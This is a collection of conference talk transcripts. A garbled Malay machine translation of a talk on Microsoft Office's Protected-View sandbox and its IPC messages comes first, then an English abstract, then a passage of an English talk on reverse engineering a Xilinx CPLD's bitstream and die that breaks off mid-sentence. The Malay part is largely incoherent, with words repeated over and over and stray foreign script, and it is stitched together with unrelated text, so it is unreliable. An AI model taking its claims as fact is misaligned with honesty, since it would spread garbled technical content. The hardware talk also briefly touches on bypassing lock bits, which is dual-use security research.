membuat keadaan API yang berkait hanya dengan keadaan Registry T dan juga keadaan Registry T tetapi dengan keadaan RIT. Dengan tidak ada keadaan SES dan keadaan UI, ia boleh menginterak dengan sebuah prosesor lain untuk membagi keadaan SES untuk memperkait sehingga ia memiliki keadaan SES atau menggunakan prosesor lain yang menggunakan keadaan SES. Akhirnya, keadaan ekonomi akan membuat keadaan SES untuk di internet. Sebelum ini, saya akan bercakap tentang mekanik IPC yang memprotektifkan SEMBOX untuk menggunakan keadaan SES yang selalu mempunyai sebuah keadaan SES untuk menjelaskan keadaan SES. Saya akan pertama memulakan keadaan SES yang digunakan oleh format dan akhirnya saya akan menghargai beberapa mesej. Ini adalah pengawasan dari objek yang menggunakan untuk pengawasan protektif. Ini berulang dengan objek manager TRIP yang berkaitan dengan IPC, meskipun, periuk periuk periuk periuk periuk periuk periuk periuk periuk. IPC periuk periuk periuk periuk periuk menerimanya status IPC nama PIP dan juga menggunakan keadaan BAPFOR yang memiliki keadaan RIT atau RIT2. IPC periuk periuk periuk periuk akan menggunakan informasi dari prosesor SEMBOX dan berikan reka sebagai salah satu peringkat di sini. Ia sindِ razón yang penting meng outstanding pemenangan Pacifican dan kwandaan RIT. Saya tidak bersekarang meng Dirutmati sewaktu ada ramai pemenangan tapi dari apa yang saya tenemos lihat perutnung covert di situ drinks�� maydan pada hubungannya자가 teruk perah apa yang memiliki sebaik barang hal hanya sebab tentara mereka memiliki cara mempunyai perasaan untuk setiap file. Ini sebenarnya mulakan dari objek melalui perasaan yang mempunyai perasaan yang berlaku di wilayah. Ini adalah file melalui yang menunjukkan perasaan yang tidak percaya yang telah diperbunyai. Perasaan melalui perasaan yang juga menghormati perasaan yang tidak percaya. Perasaan melalui perasaan yang tidak percaya dan menggunakan informasi untuk perasaan yang tidak percaya. Ini adalah perasaan lebih kecil perasaan melalui perasaan melalui perasaan yang mempercaya dan menggunakan informasi untuk perasaan yang tidak percaya. Di objek ini, beberapa perasaan tersebut kerana mereka tidak menggunakan perasaan yang boleh dipercaya atau tidak terlalu kenal. Ini adalah pertunangan untuk file melalui perasaan sebuah object. Di sini anda dapat melihat lebih jelas bahawa object file menggunakan informasi tentang file individu. Dan di particular, idang file diperkenalkan adalah penting kerana ia mengidentifikan file-nya, memulai value yang satu untuk yang pertama. Dan ini selalu digunakan di banyak IPC yang meminta untuk broker untuk memlepaskan object file yang berkhorus. App yang sama bukan selalu ada dan bergantung pada proses yang membuka file. Di atas atas atas atas atas atas atas atas perang yang dibuat dengan 1B, 2A dan 2B, kemudian objek ini tidak akan dibuat. Dan di mana-mana, IPC mesej yang WWLi akan menginginkan juga. Dan sebagai perjalanan, global variable 015E9A96 akan menunjukkan keadaan ini juga. Seluruh-suruh objek ini menginginkan bahawa ada rehat yang diperkenalkan oleh mesej IPC. Mesej ini mungkin sangat mudah untuk meminta nama file untuk ID yang berkhorus. Mesej IPC ini dapat diperkenalkan dengan dua kumpulan. Bersyukurkan apakah ia dihantar di MSO.dll atau WWL.dll. Perhatian lain dari ini adalah dengan situasi yang mengeluarkan, WWLi adalah subgroup yang akan mengeluarkan. Mesej IPC mesej itu tidak akan diperkenalkan. Seluruh-suruh mesej IPC akan mengeluarkan perhatian dan perhatian yang tersebut. Perhatian untuk mesej dan WWLi akan berkhorus. Perhatian lain akan berkhorus adalah mesej yang mengeluarkan mesej yang mengeluarkan. Mesej ID yang mengeluarkan perhatian dan jawapan bersama dan mesej yang mengeluarkan yang sepatutnya mempunyai kumpulan mesej 2000 yang kita telah melihat dari kawasan pembunuhan. Perhatian ID yang mengeluarkan adalah unik oleh mesej WWLi. Perhatian lain untuk jawapan yang berkhorus adalah yang sama, tetapi untuk perhatian pertama, kita patut menunjukkan perhatian yang mengeluarkan. Mesej ini berkumpulan di MSO dan WWLi. Mesej ini berkumpulan di MSO dan WWLi. Sebelum perhatian perhatian, perhatian pembunuhan adalah melakukan pada pembunuhan. Perhatian pembunuhan adalah mengeluarkan sehingga pembunuhan yang betul dengan pembunuhan yang berkumpulan. Atau dalam beberapa kes, perhatian IPC mempunyai pembunuhan yang mengeluarkan. Atau, perhatian pembunuhan yang berkumpulan atau perhatian pembunuhan yang berkumpulan. Sekarang kita akan melihat pembunuhan IPC yang memulai Pembunuhan 001. Pembunuhan ini tidak mempunyai pembunuhan mesej dan yang ia membuat untuk menghidupkan dan mengubah pembunuhan pembunuhan yang berkumpulan dengan kawasan kawasan kawasan, tanpa membeli pembunuhan. Dan ia digunakan sebagai pembunuhan kerja untuk pembunuhan pembunuhan yang berkumpulan. Kekal pembunuhan software ini biasanya menggunakan pembunuhan pembunuhan dengan pembunuhan sebagai kawasan pembunuhan pembunuhan. Sekarang kita akan melihat pembunuhan Pembunuhan 061 yang mempunyai pembunuhan pembunuhan mesej yang berkumpulan dalam pembunuhan pembunuhan. Jadi kita mungkin fikir pembunuhan pembunuhan Pembunuhan 061 untuk menggunakan beberapa pembunuhan untuk mengubah pembunuhan pembunuhan yang berkumpulan dengan pembunuhan pembunuhan pembunuhan dengan pembunuhan pembunuhan yang telah dikejar pada pembunuhan pembunuhan. Tapi ini akan membuat saya rasa sebab untuk mengubah pembunuhan pembunuhan pembunuhan pembunuhan yang tidak terjadi selepas pembunuhan. Jadi ini membawa kita ke sengaja scenario kedua. Sejak ia perlu dikenali, kita mungkin mahu cuba mempercayai pembunuhan pembunuhan dengan pembunuhan pembunuhan. Tapi ini juga tidak dipercayai kerana pembunuhan mesej tidak dipercayai dalam pembunuhan pembunuhan Pembunuhan DW untuk keputusan ini. Sekarang bahawa pembunuhan pembunuhan pembunuhan URL masih dipercayai daripada pembunuhan pembunuhan dan pembunuhan 091 adalah keputusan untuk keputusan ini. Ia akan mempercayai pembunuhan Pembunuhan pembunuhan Pembunuhan pembunuhan Pembunuhan. Ini akan dipercayai per per sesi dan akan dipercayai per perjalanan pembunuhan Pembunuhan. 081 berkata untuk membuat pembunuhan pembunuhan untuk pembunuhan untuk yang mempercayai untuk kembali ke pembunuhan. Ini adalah contoh pembunuhan yang hanya apabila pembunuhan pembunuhan mempercayai seperti pada saat pembunuhan pembunuhan. Pertanyaan ini adalah kerana pembunuhan tidak membuat pembunuhan pembunuhan. Apabila pembunuhan pembunuhan dibuka, pembunuhan pembunuhan akan berhasil dengan cepat dan pembunuhan untuk menjaga pembunuhan. Selepas mencombang pembunuhan, pembunuhan akan menerima pasal itu dan ia akan menjaga pembunuhan untuk mengambil pembunuhan Sehingga ini adalah keadaan yang mempunyai pembunuhan pembunuhan dan pembunuhan akan mengambil pembunuhan untuk sandbox yang dah mulut. Jadi, dalam kes yang menarik, kerana ia tidak mempercaya situasi, ia akan selalu membuat perjalanan kerja baru untuk password bahkan selepas file ini terbuka. Seperti yang anda lihat dari snap last semasa file ini sudah terbuka di latihan. Jadi, saya tidak pasti apakah keadaan ini mempunyai atau tidak. Selanjutnya, kita akan melihat mesej 0C1 yang telah mengalami keberadaan yang tidak terbuka. Di dalam perjalanan keberadaan yang terbuka, semasa perjalanan berubah, pergantungan yang terdekat akan membuat D-WIN untuk diri dan mengambil informasi tersebut, seperti eIP yang terdekat. Tapi dalam keadaan yang menarik, desainbox tidak dapat melakukan sebab kerja berlaku. Jadi, ia akan menggunakan keberadaan 0C1 supaya broker boleh membuat D-WIN pada hal ini. Dan sebab mesej IPC yang telah mempercaya sehingga 2000 bytes, broker akan mempercaya informasi tersebut dengan membuat memori yang telah dihubungi. Seperti desainbox membuat memori yang telah dihubungi dalam kabel format. Sebenarnya, broker akan mengambil informasi tersebut untuk D-WIN dalam kepadamu memori yang telah dihubungi dengan broker memori yang telah dihubungi. Ini adalah format memori yang broker akan membagi dengan D-WIN. Dua bahagian ini adalah menerimanya di sini. Di dalam keadaan pertama, WER Summit Foul List adalah listan foul foul yang telah dihubungi kepada server WER. Satu foul yang telah dihubungi oleh WER adalah untuk dipercaya oleh desainbox sebagai sebahagian IPC. Pembuatan kedua adalah perang yang telah dihubungi untuk D-WIN untuk report WER. Dan dihubungi oleh desainbox dalam memori yang telah dihubungi. Sebelum kita pergi, kita akan membuat sebuah perang yang menghadiri melalui perang yang telah dihubungi dengan sebahagian IPC. Apabila perang yang telah dihubungi, pembantu akan mempunyai 3 opsi. Periksa online untuk menolong program atau membangun program. Jika dia memilih pilihan pertama, D-WIN akan menghubungi perang yang telah dihubungi oleh WER. Dari perang yang telah dihubungi adalah perang yang telah dihubungi dengan perang yang telah dihubungi seperti perang yang telah dihubungi, yang berkaitan dengan perang ini dalam format XML. Di perang yang telah dihubungi ia akan membuat jika perang ini cukup menarik atau unik dalam perang data dan jika ia sangat menarik, ia akan meminta aplikasi untuk perang yang telah dihubungi dengan perang yang telah dihubungi yang telah dihubungi dan perang ini akan dihubungi dalam paket dot-hat. Setelah menghubungi, D-WIN akan menghubungi Mountain Network Sementara masih. Jadi tanap caranya sangat wer Sudah levah itu. ним ideals stemsi weiter Pertama, ia menyebabkan bahawa Sambox memperkenalkan broker untuk menghubungkan container Sambox. Seperti yang dikatakan dengan Founame Fuew, Sambox akan membuat satu file di paket doktat untuk data level 2. Tetapi, Fuew akan membuat hanya founame fuew kerana broker akan pertama mencari keadaan yang tidak terlepas sebelum mempengaruhkan pembentangan Sambox untuk pembentangan Sampoq ini memastikan foun ini diada di container Sambox. Sambox menunjukkan pembentangan Sambox yang hanya memperkenalkan pembentangan. Tapi jika anda mencari MSDN, ia akan berkata bahwa dalam file IOAPI, secara internal, ia akan membuat founame fuew kembali kembali kembali kembali kembali kembali. Jika anda memakai founame fuew, ia akan membuat founame fuew mengambil pembentangan dan memasukkan founame fuew. Sehingga, saya boleh menunjukkan founame fuew. Baiklah. Sebegitu, kita membuat apa yang kita buat untuk memperkenalkan DLL dalam proses Sambox dengan pembentangan. Ya, ia adalah pembentangan. Jadi, ini adalah parameter? Ya, tidak. Jadi, ini adalah parameter untuk mesej 0C1 dan ini adalah pembentangan untuk membuat founame fuew. DLL akan juga membuat membuat pembentangan Sambox dan membuat membuat founame fuew. Jadi, jika anda mahu melihat pembentangan yang diperkenalkan tadi, anda boleh membuat membuat pembentangan yang diperkenalkan dan membuat pembentangan. Jadi, sebetulnya, apa yang kita meminta adalah langkah ini, ini membuat kita membuat pembentangan Sambox ke dalam kainan ke atas kainan dan cuba memulai pembentangan ini. Saya akan membuat pembentangan dan dengan mengandung pembentangan, anda boleh memasukkan pembentangan ke dalam kainan Microsoft atau anda boleh membuat pembentangan sebab pembentangan anda, dan sebab anda tidak memasukkan apa-apa yang anda akan melakukan pada pembentangan pembentangan anda hanya membuat pembentangan di sini dan ini sebenarnya pembentangan kami di sini. Jadi, saya akan membuat pembentangan pembentangan. 130. Okey. Jadi, kita membuat pembentangan 3, 4, 4, 4. Okey, periksa online untuk menghentikan data level 1. Jadi, data level 1 mengandungkan XML yang sepatutnya seperti ini. Dan ini akan beritahu serva-server OS dan aplikasi versi dan juga informasi keberanian dan ini akan adalah file yang akan dibentang kembali ke level 2. Jadi serva akan memasukkan kembali kembali ke level 2. Data level 2. Dan sebelum pembentangan, serva akan perlu membuat permintaan untuk membuatnya. Jika anda melihat pembentangan yang tersebut yang dikeluarkan, anda akan melihat bahawa ini sebenarnya yang kita mengalami. Dibentang oleh pembentangan di sini. Kita akan memasukkan dan ini akan dibentang. Dan ini patutnya memasukkan di sini. Ya. Jadi ini akan di deskripsi. Jadi, kita boleh mengeluarkan file untuk serva yang dikorek untuk wasan.microsoft.com atau untuk penggambaran serva yang dikorek. Jika tidak, kita boleh menggunakan dwindl untuk memasukkan file yang dikorek sehingga ia akan tersebut selepas memasukkan pembentangan. Jadi ini akan dikorek dan kemampuan untuk membuat serva yang dikorek. Jadi kita akan melihat jika ini masih ada di pembentangan 2016. Pada mesej yang terakhir, pembentangan 0F1 adalah mesej yang membuat clv.exe yang akan memasukkan pembentangan pembentangan terdapat pada pembentangan. Dan pada mesej yang 0C1 ada juga AV di sini. Dan kali ini kita akan memasukkan pembentangan. Jadi pada sisi terakhir kita akan melihat jika ada pembentangan yang dibuat untuk model sandbox 2016. Dalam pembentangan, ada dua pembentangan yang penting. Pada pembentangan yang terakhir, pembentangan pembentangan terdapat pada model individual seperti MSO20 Win32 Client.dll. Dan kemudian pembentangan secara secara secara secara secara baru dengan Windows 8 juga dikorek. Dalam pembentangan sandbox, tidak ada kemampuan yang dikorek jadi apa yang bermakna adalah tidak akan ada pembentangan untuk pembentangan yang sandbox boleh menggunakan. Pada pembentangan yang terakhir, pembentangan yang terdapat selain untuk pembentangan pembentangan yang korek boleh menggunakan sebelum memulai pembentangan sandbox. Jadi pembentangan ini sedang terlihat agak keras kerana sekarang tidak ada cara yang boleh kita pembentangan pembentangan pada EBS kemudian membuat pembentangan untuk pembentangan pembentangan. Mungkin ini berkongsi untuk pembentangan yang akan diperlukan pada perjalanan. Jadi disini kita lihat pembentangan 0C1 lagi. Dan saya menarik saya kerana sejak masa yang mereka berjawab pada masa pembentangan 2016, itu sebenarnya 2.5 bulan untuk menambah beberapa alasan untuk mencari untuk ke depan. Jadi jika anda mencari pembentangan yang di-lihat dengan yang di-lihat, anda dapat lihat bahawa tidak ada perubahan untuk pembentangan yang belum dikorek. Jadi, tentu saja, ini adalah salah satu alasan yang terhadap keadaan untuk dilakukan. Tapi saya faham bahawa kerana untuk mencari ini akan pertama membutuhkan keadaan yang di-lihat dalam pembentangan. Kemudian alasan penggunaan yang digunakan juga perlu disentuhkan kembali kembali ke WEL dan juga untuk membunuhkan. Jadi masalah 161 ini adalah alasan yang baru dibunuh pada tahun 2016. Dan ia akan di-lihat hanya dengan alasan yang di-lihat. Alasan yang dibunuh oleh alasan. Jadi, alasan yang mudah untuk memprotek atau memprotek alasan ini untuk keadaan yang di-lihat. Dan akhirnya, alasan ini adalah alasan yang baru dibunuh, tetapi tidak ada apa-apa yang lain. Jadi, pada akhirnya, alasan yang baru dibunuh tidak memperbaiki alasan yang sepatutnya yang digunakan. Oleh itu, ia dapat membuatkan perjalanan dan kekontrolan alasan untuk memperbaiki model yang sangat mudah. Alasan ini juga bermaksud bahawa alasan yang mempunyai alasan yang di-lihat dan sebagai perjalanan, alasan Odobe mempunyai alasan yang lebih 200 lagi daripada alasan yang di-lihat dalam perjalanan yang di-lihat. Meskipun, alasan yang masih di-lihat, untuk contoh, alasan desktop dan alasan UI yang di-lihat tidak di-lihat oleh perjalanan. Alasan ini telah di-lihat sejak IEPM. Alasan yang menarik untuk alasan kualiti Microsoft telah di-lihat dengan alasan yang berbunuh dan sebagainya. Tetapi, alasan yang di-lihat masih di-lihat, walaupun bahawa alasan itu mempunyai alasan yang lebih berjalanan, dan juga alasan yang di-lihat yang tidak di-lihat. Untuk menggunakan alasan 2016 sebagai alasan untuk menggunakan bagaimana alasan yang boleh berubah, sedikit bahawa tidak akan ada banyak perubahan, tetapi saya berterus berterus memikirkan bagaimana alasan yang baru yang dilakukan dalam perjalanan. Semua ini masih membuat alasan yang baik untuk pelanggan. Di sini adalah alasan yang di-lihat dan ini adalah akhirnya. Terima kasih.
|
The first part of this talk will sketch the Protected-View sandbox internals by discussing about its architecture, its initialization sequence and the system resource restrictions. The second part will discuss the Inter-Process Communication (IPC) mechanism, including the mode of communication, undocumented objects involved, format of IPC messages and the semantics of selected IPC messages.
|
10.5446/32817 (DOI)
|
You guys hear me now? Okay, sounds good. So my talk is called from Silicon to compiler and it's pretty much that. So we're going to start off with what we're doing, why we're doing this, a little bit of architectural background on programmable logic for those of you who have not done work on programmable logic before. Then jump to a block diagram of the device. We'll start with the high level overview of the silicon and then we'll drill down into more interesting stuff down to transistor level and gate level circuit analysis. At the end I do have a live demo of firmware produced by my tools running on live silicon. Sadly there are no cute pictures in this presentation, sorry. So a little background about me, I pretty much like to build and break everything. I will do web stuff if they pay me enough. I mostly like to live down in low level, a bit of ring zero, firmware, low level board design, RTL design and now getting down into transistor level. I just finished up my PhD a few weeks ago. During that time I designed and created what I believe is the first ever college class on semiconductor reverse engineering. I tried quite hard to find another one that I could borrow notes and slides from as far as I can tell none existed. And I'm also obviously a significant contributor to Silicon Prone. So if you see all the guys walking around with decap chips in their shirts, say hi. I've only been with IO active since January. A lot of this work was actually done before I joined the company but they've supported me continuing the work. So I acknowledge them for that obviously. So as far as what we're actually trying to do and why, program logic is really everywhere these days. You may not know it but a lot of especially high end networking AV, all sorts of stuff has program logic in it because A6 these days the tape out costs are so high especially for leading edge process nodes it usually is not actually cost effective to make custom silicon unless you're making a huge number of them like for a smart phone or something. For anything else you're probably better off running on an FPGA. And the problem is they're full of black boxes. Nobody really knows what happens when you compile your bit stream onto a device. You know okay well we've got these lookup tables, we've got these RAM blocks but what is actually going on underneath? How do I know that the RTLI gave the compiler is actually equivalent to what the actual device's behavior is? We don't know. Or how do I do development on a platform that is not x86 or x64 windows or one of the very short list of Linux distros they support? Sorry, out of luck. And let's say we think we found a compiler bug. Oh we just pop the code and obj dump and look at it. Nope there is no decompiler for the bit streams so if you think it's generating bad code, sorry you're screwed. And of course reverse engineering this is recon. The vendors want people to think bit stream reversing is hard. They advertise their closed source proprietary format as being impossible to reverse engineer. It's not. So as far as the methodology here, I just decided earlier today to take a look at the size of the directory I had installed the Xilinx tools in. 18 gigabytes. I don't know about you but I don't have time to look through 18 gigabytes of stuff in IDA. There are much better things I could spend my time on. And plus the license agreement says I'm not supposed to be a reverse engineering software. I never agreed not to look at the silicon. So open source spending means necessary. So this is our target. It is the Xilinx XC2C32A. I chose it for a bunch of reasons. One is that it is very cheap. They're about $1.15 each on Digi-key in single units as of a couple of weeks ago. I think the price just went up to $1.20 something. But they're still cheap enough you can afford to kill large numbers of them testing. You have your choice of a nice big QFP package that's easy to hand solder, has plenty of plastic around the package so it's easy to decap while keeping bond wires intact. Or you can do chip scale BGA or QFN if you just want to dunk the thing in acid and get rid of all the plastic and take a look at the silicon. It's a nice friendly 1.8 nanometer process for metal UMC. So you can actually read out most of the upper metal layers optically. You don't have to bother going into the electron microscope except for the lowest layers. So that helps. It's a lot easier to use an optical microscope in a SAM. It's a lot quicker to shoot a lot of images quickly. The bitstream is also not that big. It's around 12K. So there's not really that much better reverse. And it's also a fairly simple architecture. You're not going to find block ram and embedded arm cores and all kinds of stuff like that. It's just pure programmable logic. And the two vendor tools are free which always helps. Hackers are cheap. So the bitstream format for this thing at a high level, the output of the compiler is a JDEK programming file. It's basically the equivalent of IHACS but instead of being HACS lines, it's binary lines, ASCII 1s and 0s. So this is the exact data that gets written to the chip. Not in the actual order. I'll get to that later. But it is, there is a one-to-one correspondence between these 1s and 0s and configuration bits on the device. And the nice thing is that, as you can see on the right side here, the bitstream generated by this I-Link's tools, if you're so inclined, does have comments. Turns out they're not very useful. They just say, okay, block zero ZIA. Well, what is a ZIA? Look in the datasheet. There is not one reference to ZIA. Okay. It doesn't really help me much. So let's get a little bit into the architecture of what a CPLD actually is. So any digital equations can be expressed using a form known as sum of products. It's a canonical representation of digital equations in which you take a series of terms, you bitwise and them together, either of the input or its complement. You can just treat the complement as coming into your device. So you've got A and B and C or C and D and E, et cetera. So you can express any arbitrary digital equation this way. So let's look at how we'll actually make a chip to do this. So if we have a large, say, 32 input AND gate and we have a MUX at the input to the gate, that lets me select between a constant one or the input to my circuit, I can effectively MUX any subset of these inputs and just leave the others as one, which is the identity for the bitwise AND operation. So I can AND together any subset of the possible inputs to this AND gate. The same thing can be done for OR. Obviously, you have to use zero as the identity element for bitwise OR. But what this means is you can create a gate that has a huge number of inputs and I can pick any subset from those at runtime with MUX settings. So this leads to a natural structure for a programmable logic device. You make a grid of gates with a 2-1 MUX at each input. You've got inputs coming in, outputs going down, and then you just have a series of gates in sequence and stuff together. So this is actually a render for my tool. You can see we've got the input coming in. We select either X or X prime and that with the data coming in from overhead. Take the output of that. Now here we skip the AND gate. This is more of a logical view, so I'm not actually showing the actual MUXes in the chip. This is more of a schematic view of what the circuit logically does. I'm also rendering it as a cascaded sequence of gates end to end. In practice, the actual implementation on silicon is usually a tree because nobody wants order AND propagation delay when you could have order log AND instead. So if we take this and we want to build a full programmable logic device, what we do is we take a bunch of signals coming from our registers that store state. We take a bunch of signals from our input pins. Then we feed these into an AND array. We invert them so we have two times however many inputs. We take M product terms out of that. The product terms then go into a programmable array. The output of that gives us, we'll just call it our outputs. Then we feed those either into an output pin or into a flip-flop of one of the state machines or something like that. So this is really all it takes to build a simple programmable logic device or SPLD. The problem is SPLDs scale poorly. You end up having quadratic scaling with the number of inputs. Nobody wants to die whose size scales quadratically with the amount of work it can do. That's terrible. So how can we improve this? Well, it turns out we can make a grid of small SPLDs. So it doesn't show up as well as I had hoped on the projector, but we've got one SPLD block here. We've got one here and there's a crossbar switch in the middle. So now we can create a bunch of outputs from one SPLD, a bunch of outputs from the other, and then just feed them all into one big routing fabric, pick out whichever signals I'm interested in processing on this half of the chip or that half of the chip, and then feed them into the SPLD. So this is a SPLD. So now let's look at the specific SPLD that we've been targeting today. So there are 32 GPIO pins which are full input output plus one input only pin. I'm pretty sure this is because they intended to package the die in a 44 pin QFP package. All of the other stuff for JTAG power and the 32 GPIOs use 43 pins. They didn't want to have one NC pin. So they just threw one extra signal into the global routing that you can't drive and it just serves as an extra input. And then the remainder of the device is two function blocks which are basically SPLDs. Each one has 16 GPIO pins, 16 flip flops. Of the 65 signals in the global routing, so 32 IOs, 32 flip flops plus one input only 65. We pick 40 of those, feed those into an 80 by 56 and array, then a 56 by 16 array. This is all documented in the data sheet. What's not documented is, okay, we can make a technology math net list. We know, okay, I have these inputs added together, these outputs or together. Now, how do I actually make the chip do what I want? So time to put in our lab codes. I am not going to talk about decapping and imaging. This has been beaten to death in other talks like recon last year and I think the year before that and probably the year before that. So we're not going to cover that. There's a lot of good stuff up on SiliconPron. There's, if you read the lecture notes from the class I taught at RPI last year, there's a lot of good material there. But this talk is about reverse engineering, not on sample preparation. We're not going to be teaching you how IDA works. We're teaching you how to actually reverse engineer this specific device. So here is the metal 4 overview of the device. We can see that there is a roughly left-right symmetry. It's not exact. You can see here there's something that's not mirrored here, but up here it looks like the device is pretty symmetrical. So first impression, we've probably got the two function blocks left-right symmetric on the device. Let's go down a little bit. After we've etched off all of the metal and poly layers, we're now looking at the implant layer. This is after a process known as dash-etch, which stains P-type doping either brown or it shows up raised under the electron microscope. Mainly, though, it's useful because it provides contrast in areas of gates. So you can see we've got pair-wise symmetry here and here. Those are probably the function blocks. There's something down the middle. That's probably the global routing. Then there's a large memory right here. Pretty obviously the EEPROM where the bitstream is stored. Then if we actually follow the bond wires from the die out the pins in the package, you can see these are the JTAG pins, CDI, TMS, TCKI, I believe top to bottom. The TDI pin is right there. So we can conclude that the JTAG shift register probably runs left to right across this configuration area and somehow allows you to write this EEPROM here. There's also a few small pairs. There's one up there. There's one up there. I think there's one on the upper left. There's a total of six. I have not yet figured out what these do. It wasn't necessary to reverse the portions of the device I needed. So that remains future work. So let's take a closer look at the function block. So we know there are 16 macros cells. Each macros cell contains one flip-flop and stores the output of one term of the ORA and has a little bit more glue logic I'm going to talk about later on. So there is 16 wide symmetry here. 16 identical copies of this. Just by looking at this, we can be pretty sure we're looking at the macros cells. Then we see some structures up here and here. This looks symmetric. This looks symmetric. This looks symmetric but different. So as it turns out, the AND array is not actually one solid block. The AND array is split in half. They've got 20 signals here, 20 signals here. Collectively that forms 40. Then they AND the outputs of those two individual blocks together. That gives you our product terms. And then that goes into the ORA here and then out the macros cells. So now let's take a quick look at the configuration bit structure before we dive into detailed die analysis. So the programming documentation does talk a little bit about how the device is put together. It turns out that even though the JED format is supposed to be something you can actually just feed to an EPROM program and load the device, that's not the case here. The bit ordering in the JED file is actually virtual addressing in which they abstract away all of the quarks of the silicon. So for example, all of the AND array bits and all of the ORA array bits are in the same order in the JED file for each one. Turns out half the actual AND and ORA array blocks on the device are mirrored left right. So you actually have to do address translation before you can take a bit stream generated by their tools and flash to the chip. Luckily they do sort of document this. There's a big Excel file they publish to people who are making program error adapters that is just a big grid of output and input and just has a intrate each cell. It says, okay, which config bit from the JED file goes this physical address? So it doesn't really tell you much about how the chip is put together. The actual structure is 48 rows by 260 columns. There's one extra row full of configuration metadata. I'll get to that later. But it stores seven lock bits, which some of them are always one. I'm not entirely sure what purpose they serve. The remainder are one for an unlocked device and zero for a locked device. Then there's two done bits, which indicate, okay, this bit stream is valid. We have a legal firmware and the chip has been fully flashed. And it turns out also only 258 of the 260 columns are usable. The remainder are what we call transfer bits, which as far as I can tell, you just put them as a constant zero. It just indicates, hey, this row of EPROM has actually been programmed. We didn't abort halfway through programming. There is some documentation of this in a patent from Xilinx, but it didn't really give enough detail for me to figure out, okay, why are they doing this? And the other intuition we can get from this is that since it is EPROM based, then FF is going to be the state of the memory when the chip is blank. So therefore, we expect most of the memory on the device is going to be active low. So most things should be turned off when the bit is high and on when the bit is low. We just don't know exactly what that bit does yet. So now let's take a look at the actual die structure. So you can see that the configuration memory is not actually one block. We've got an array here, one here, one here, one here, and one hiding all the way over here. And as it turns out, the size of these are symmetric about the center, and they go directly up to the corresponding logic. So it's pretty obvious we found the memory that configures that part of the chip. The data just flows straight up during the boot process. So this configures the end of the array, this configures the global routing, this configures these macro cells, this configures these macro cells. We can confirm this if we look up at the metal two. You can actually see the lines coming off the send sample fires for the EPROM going up and vertically into the array. And if you trace it out all the way, you can actually see it writing to the individual configuration SRAM cells in the die. There are a few bit lines here and here, for example, that are connected and I believe metal three instead of metal two. They couldn't fan it all out in one layer. So now let's take a look at the main logic array. If we actually look at where the SRAM cells are and count how many rows high each individual block are, we see that the end array is 20 rows high, the or arrays eight rows high, other half is 20 rows high, and each macro cell is three rows high. So that gives us a pretty good idea. We know left, right, which bits in the bit stream configure which logic just by what's physically proximate to it. And we can make a pretty good guess that since we have a 2DS for MRA here in the configuration area, we have a 2D flash array, we probably have either top to bottom or bottom up addressing. There's actually some gray code going on. It's a little more complex than that, but logically we should have the addressing going across vertically. So if we take a closer look at the end array, we know that there are 56 product terms. We know that there are supposed to be 40 rows and 40 complements of rows for a total of 80. If we actually count how many SRAM cells are, we'll see there's one 12 bits wide, just 56 times two. There's two blocks of 20 rows each. So the conclusion is that since we know there's 40 inputs coming in from the crossbar, we've got two blocks that are each 20 rows high, each row probably corresponds to one row of input. And then we know that the width of the array is double 56. So it's probably two bits per product term. One selects X, one selects non-X, or maybe some sort of other code. As it turns out, it is one-hot coded. I just figured this out by experiment. It was pretty easy. Just try one, see if it works. If not, try something else. There's only four possibilities. So the or array turns out to be 56 and terms, 16 outputs. If we count the config bits, it's still one 12 bits wide. It's the same, coming up off the same EEPROM, but it's only eight rows high. And there's only 56 inputs. Since the or array does not have an X and X prime input, my conclusion is that we still have one hot select thing for one particular input, but we do have two actual arrays of the or array interleaved in one configuration row. I got a little tinkering. It was pretty simple to figure out the actual bit ordering. So now let's take a look at the macro cells. There are 27 configuration bits per macro cell. If we look, you can see there's one 60S RAM cell, one 60S RAM cell, and so on. There's a 9 by 3 grid. It turns out this 9 by 3 grid does not actually control one macro cell. The bottom two rows of this RAM control the bottom one. This goes to the upper one. This threw me off a little bit when I started looking at the circuit, but it turns out that yes it is 27 cells, yes it is 9 by 3. No, the 9 by 3 structures in the die do not actually correspond to this. So this makes intuitive sense. The EEPROM at the bottom of the die is, well, okay, it's 10 bits wide, but we know one of them is a transfer bit. So the other nine bits go directly up to here. I've figured out a significant fraction of the functionality, not quite all. There's still some clocking stuff I'm a little unsure on right now. These also configure IO buffering and stuff like that. So there are lines coming out from these to the side of the device and controlling the IO buffers. Now I will, as a quick aside, jump into the security bits. We know there are nine done bits and lock bits somewhere on the device. We know that the physical address of these is in the right hand macro cell memory. It's in the top row. There's nine 60S RAM cells right here that don't appear to be hooked up to any of the actual logic array. I have not actually tried fibbing these. I don't know for certain that these are the lock bits, but it is pretty obvious. Especially when we know of those nine bits, four of them have to be held low to lock the device. There's a four input NOR gate right here and an inverter right there. Hmm, I wonder what happens when I cut that line. I don't know. So now we'll get to the global routing. So we know between the left and the right halves of the end array, there is something. We know that it is 20 configuration bits high for each half. We know it's 16 bits wide. We don't know anything more than that. The data sheet has about two sentences that talk about the global routing. So there is, we have no idea whatsoever how it works. What we do know is that of those 65 signals coming in, we know that 20 of them go to the left function block, 20 go to the right. Those subsets may or may not have any relationship. And we know since it's 16 bits wide, we probably have eight bits selecting what goes left and eight bits selecting what goes right. So now here's the question. How do you make a 65 to one MUX with eight bits? If you just had zero to 65, you'd only need seven bits. If it was one hot, you'd need 65 bits. So what sort of strange, perverse code are they using here? The data sheet is of exactly no help. Well, time to get dirty. So if we jump into the electron microscope and take a look at the implant layer after dash-ups, so you can see these areas here show up raised. Those are P-channel. These are N-channel. You can see that it's slightly lower. The raised areas are the individual channels for the FETs. This is zoomed out. The original image is a lot higher resolution, but I can't really fit it in the projector. So this is the implant layer. What we can see immediately is that there's some sort of symmetry going on, both horizontally and vertically. If we jump up to metal four, we see that there are six small buses of 11 signals each. The rightmost is 10. All right? Five times 11 plus 10. What's that, anybody? 65. Hmm. There are 65 signals going into global routing. I think we found them. So I spent quite a while in Inkscape vectorizing this. My automated tools are not quite as well-developed as I had hoped. So it did take me a while, but I do now have a full vectorization of the entire global routing matrix from implant layer all the way up to metal four. The little gray boxes are not actually layout. There are standard cell outlines. So we've got a inverter here, another inverter here, another inverter here, and so on. So we can see that there are six identical blocks going left to right here. There's two weird blocks over there that are identical to each other at first glance, but not identical to the rest. Okay. This is starting to get interesting. So those big drivers on either side are pretty clear of the buffers driving the PLI. We've got a fan out of 112. We need a fairly big buffer. There are, I believe, 20-some fingers on this last inverter. So that looks like a high fan out driver. It's actually a three-stage inverter because the low-level stuff in the programmable logic doesn't actually have the drive current to drive that much gate capacitance. So they actually have a three-stage driver inverting it, inverting it again and increasing the current once again to actually drive the output. And of 